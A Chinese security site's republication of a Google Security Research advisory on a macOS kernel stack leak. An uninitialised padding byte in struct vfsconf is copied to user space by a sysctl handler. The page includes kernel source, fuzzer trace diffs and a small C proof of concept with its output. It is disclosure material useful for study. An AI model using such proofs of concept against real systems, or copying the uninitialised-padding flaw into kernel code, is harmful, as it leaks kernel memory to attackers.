首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding
来源:Google Security Research 作者:Google 发布时间:2018-01-30  
/*
The sysctls vfs.generic.conf.* are handled by sysctl_vfs_generic_conf(), which is implemented as follows:
 
static int
sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
{
        int *name, namelen;
        struct vfstable *vfsp;
        struct vfsconf vfsc;
        
        (void)oidp;
        name = arg1;
        namelen = arg2;
        
        [check for namelen==1]
                        
        mount_list_lock();
        for (vfsp = vfsconf; vfsp; vfsp = vfsp->vfc_next)
                if (vfsp->vfc_typenum == name[0])
                        break;
        
        if (vfsp == NULL) {
                mount_list_unlock();
                return (ENOTSUP);
        }
                        
        vfsc.vfc_reserved1 = 0;
        bcopy(vfsp->vfc_name, vfsc.vfc_name, sizeof(vfsc.vfc_name));
        vfsc.vfc_typenum = vfsp->vfc_typenum;
        vfsc.vfc_refcount = vfsp->vfc_refcount;
        vfsc.vfc_flags = vfsp->vfc_flags;
        vfsc.vfc_reserved2 = 0;
        vfsc.vfc_reserved3 = 0;
                        
        mount_list_unlock();
        return (SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf)));
}
 
`struct vfsconf` is defined as follows:
 
struct vfsconf {
        uint32_t vfc_reserved1;         /* opaque
        char    vfc_name[MFSNAMELEN];   /* filesystem type name
        int     vfc_typenum;            /* historic filesystem type number
        int     vfc_refcount;           /* number mounted of this type
        int     vfc_flags;              /* permanent flags
        uint32_t vfc_reserved2;         /* opaque
        uint32_t vfc_reserved3;         /* opaque
};
 
`MFSNAMELEN` is defined as follows:
 
#define MFSNAMELEN      15      /* length of fs type name, not inc. null
#define MFSTYPENAMELEN  16      /* length of fs type name including null
 
This means that one byte of uninitialized padding exists between `vfc_name` and `vfc_typenum`.
 
 
This issue was discovered using an AFL-based fuzzer, loosely based on TriforceAFL. This is the diff of two runs over the fuzzer queue with different stack poison values (0xcc and 0xdd):
 
--- traces_cc_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:41.486752415 +0100
+++ traces_dd_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:56.583413293 +0100
@@ -1,19 +1,19 @@
 loaded 72 bytes fuzzdata
 USER READ: addr 0xffffffffffffffff, size 8, value 0x00000600020000ca
 USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000003
 USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000004
 USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000060000
 USER READ: addr 0xffffffffffffffff, size 8, value 0x00ea800500000010
 USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000010003
 USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000000
 syscall(rax=0x600020000ca, args=[0x3, 0x4, 0x60000, 0xea800500000010, 0x10003, 0x0]); rsp=0x7ffee418eda8
 USER READ: addr 0x3, size 8, value 0x0000000000000003
 USER READ: addr 0xb, size 8, value 0x0000001700000002
 USER WRITE: addr 0x60000, size 8, value 0x0073666800000000
 USER WRITE: addr 0x60008, size 8, value 0x0000000000000000
-USER WRITE: addr 0x60010, size 8, value 0x00000017cc000000
+USER WRITE: addr 0x60010, size 8, value 0x00000017dd000000
 USER WRITE: addr 0x60018, size 8, value 0x0000100000000001
 USER WRITE: addr 0x60020, size 8, value 0x0000000000000000
 sysret
 OUT OF FUZZER INPUT DATA - REWINDING
 REWIND! (trigger_exception=0x10006; cycles=7)
 
Verified on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:
 
$ cat sysctl_conf_test.c
*/
 
#include <stdlib.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mount.h>
 
struct vfsconf_withpad {
  int reserved1;
  char name[15];
  unsigned char pad1;
  int typenum;
  int refcount;
  int flags;
  int reserved2;
  int reserved3;
};
 
int main(void) {
  int name[] = { CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 };
  static struct vfsconf_withpad conf;
  size_t outlen = sizeof(conf);
  if (sysctl(name, sizeof(name)/sizeof(name[0]), &conf, &outlen, NULL, 0))
    err(1, "sysctl");
  if (outlen != sizeof(conf))
    errx(1, "outlen != sizeof(conf)");
  printf("name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\n",
      conf.name, conf.pad1, conf.typenum, conf.refcount, conf.flags);
}
 
/*
$ gcc -o sysctl_conf_test sysctl_conf_test.c -Wall
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
*/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle WebLogic wls-wsat Compo
·Arq 5.10 - Local Privilege Esc
·Trend Micro Threat Discovery A
·Arq 5.10 - Local Privilege Esc
·BMC BladeLogic 8.3.00.64 - Rem
·Advantech WebAccess < 8.3 - SQ
·Asus Router Cross Site Script
·System Shield 5.0.0.136 - Priv
·ASUS DSL-N14U B1 Router 1.1.2.
·LabF nfsAxe 3.7 TFTP Client -
·AsusWRT Router < 3.0.0.4.380.7
·BMC BladeLogic RSCD Agent 8.3.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved